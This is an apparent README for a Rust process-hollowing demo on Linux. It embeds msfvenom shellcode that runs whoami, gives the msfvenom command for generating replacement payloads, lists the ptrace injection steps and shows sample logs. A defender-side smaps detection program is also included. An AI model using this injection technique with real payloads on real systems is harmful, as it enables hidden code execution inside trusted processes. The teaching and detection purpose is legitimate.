This repository provides an example of process hollowing on Unix systems implemented in Rust. Process hollowing is a technique often used in penetration testing and malware development where an executable process is started and its memory is replaced with arbitrary shellcode, effectively "hollowing out" the original process.
In this example, a /bin/ls process is hollowed and its code replaced with shellcode. By default, the shellcode, generated with msfvenom, executes the whoami command.
Features
- Demonstrates process hollowing on Unix systems using Rust.
- Uses ptrace for memory manipulation and process control.
- Executes arbitrary shellcode within the hollowed process.
Shellcode
By default, the shellcode used in this example is a whoami payload generated by msfvenom; it prints the current user's username when executed.
The shellcode is pre-generated and embedded directly in the source as a byte array:
let shellcode: [u8; 43] = [
    0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73,
    0x68, 0x00, 0x99, 0x50, 0x54, 0x5f, 0x52, 0x66,
    0x68, 0x2d, 0x63, 0x54, 0x5e, 0x52, 0xe8, 0x07,
    0x00, 0x00, 0x00, 0x77, 0x68, 0x6f, 0x61, 0x6d,
    0x69, 0x00, 0x56, 0x57, 0x54, 0x5e, 0x6a, 0x3b,
    0x58, 0x0f, 0x05,
];
This shellcode can be replaced with any custom shellcode for testing purposes.
Prerequisites
- Rust: Ensure you have the Rust toolchain installed. Visit rust-lang.org for installation instructions.
- Unix-based OS: This example is designed for Unix systems (e.g., Linux). The default shellcode is a linux/x64 payload, so it expects an x86_64 Linux host.
To generate your own shellcode (e.g., with msfvenom):
msfvenom -p linux/x64/exec CMD=whoami -f rust
Replace the default shellcode in the source code with your generated shellcode.
How It Works
- Forking a Child Process: The program forks the current process into a parent and child.
- Tracing the Child: The child process places itself under ptrace so that the parent can stop it, inspect its registers and write to its memory.
- Executing /bin/ls: The child process executes /bin/ls using execve as a placeholder process.
- Injecting Shellcode: The parent process writes the shellcode to the child process's memory at its instruction pointer (RIP).
- Resuming the Process: The parent process resumes the execution of the hollowed child process, running the shellcode.
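As an added defender-side example (not code from this repository): the injection step writes into a private, file-backed text mapping, so the kernel copies that page and it shows up as Private_Dirty in /proc/<pid>/smaps, whereas an untouched executable mapping of the binary or the loader reports 0 kB. The Rust program below parses smaps text and flags such mappings; SAMPLE_SMAPS is a constructed sample, not captured output, and the program name dirty_text is hypothetical.

```rust
// Added example, not code from this repository: flag executable file-backed
// mappings with privately dirtied pages, the trace a ptrace write into a
// process's text leaves in /proc/<pid>/smaps. Heuristic only: debugger
// breakpoints and legitimate runtime patching produce the same signal.
use std::fs;

/// An executable, file-backed mapping with non-zero Private_Dirty.
#[derive(Debug, PartialEq)]
pub struct DirtyText {
    pub range: String,
    pub path: String,
    pub private_dirty_kb: u64,
}

/// Constructed sample (not captured from a real system): the r-xp mapping of
/// /bin/ls has one dirtied text page; the loader's text and the heap do not count.
pub const SAMPLE_SMAPS: &str = "\
5581a3e04000-5581a3e1a000 r-xp 00004000 fd:01 1234 /bin/ls
Private_Dirty:         4 kB
5581a3f00000-5581a3f21000 rw-p 00000000 00:00 0      [heap]
Private_Dirty:       132 kB
7f1b2c000000-7f1b2c028000 r-xp 00001000 fd:01 5678 /usr/lib/ld-linux-x86-64.so.2
Private_Dirty:         0 kB
";

/// Parse smaps text; report r-xp file-backed mappings whose Private_Dirty is non-zero.
pub fn find_dirty_text(smaps: &str) -> Vec<DirtyText> {
    let mut hits = Vec::new();
    let mut current: Option<(String, String)> = None; // (range, path) of the mapping being read
    for line in smaps.lines() {
        let f: Vec<&str> = line.split_whitespace().collect();
        // Mapping header: "start-end perms offset dev inode [path]"; only those
        // that are executable ('x' in perms) and backed by a file path are tracked.
        if f.len() >= 5 && f[0].contains('-') && f[1].len() == 4 {
            let path = f.get(5).copied().unwrap_or("");
            let tracked = f[1].as_bytes()[2] == b'x' && path.starts_with('/');
            current = if tracked { Some((f[0].to_string(), path.to_string())) } else { None };
        } else if let (Some((range, path)), Some(rest)) = (&current, line.strip_prefix("Private_Dirty:")) {
            let kb: u64 = rest.trim().trim_end_matches("kB").trim().parse().unwrap_or(0);
            if kb > 0 { hits.push(DirtyText { range: range.clone(), path: path.clone(), private_dirty_kb: kb }); }
        }
    }
    hits
}

fn main() {
    // Usage: dirty_text <pid>; reading another process's smaps needs ptrace access to it.
    let pid = std::env::args().nth(1).expect("usage: dirty_text <pid>");
    let smaps = fs::read_to_string(format!("/proc/{pid}/smaps")).expect("cannot read smaps");
    for h in find_dirty_text(&smaps) {
        println!("{} {} Private_Dirty={} kB", h.range, h.path, h.private_dirty_kb);
    }
}
```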
Usage
Clone the repository:
git clone <repository_url>
cd <repository_directory>
Build the project:
cargo build --release
Run the binary with root privileges:
sudo ./target/release/process_hollowing
Observe the output:
The parent process will print logs showing the memory manipulation and injection. The hollowed process will execute the whoami shellcode, printing the username of the current user.
I'm the parent! My child is 12345
Child stopped: Stopped(PtraceEvent)
RIP: 0x7fffabcde000
Writing shellcode to child process...
Wrote chunk to 0x7fffabcde000: 0x68732f2f6e69622f
...
Shellcode written!
root
This project is for educational purposes only. Misuse of this code can result in legal and ethical consequences. Always ensure you have explicit permission before using techniques like process hollowing.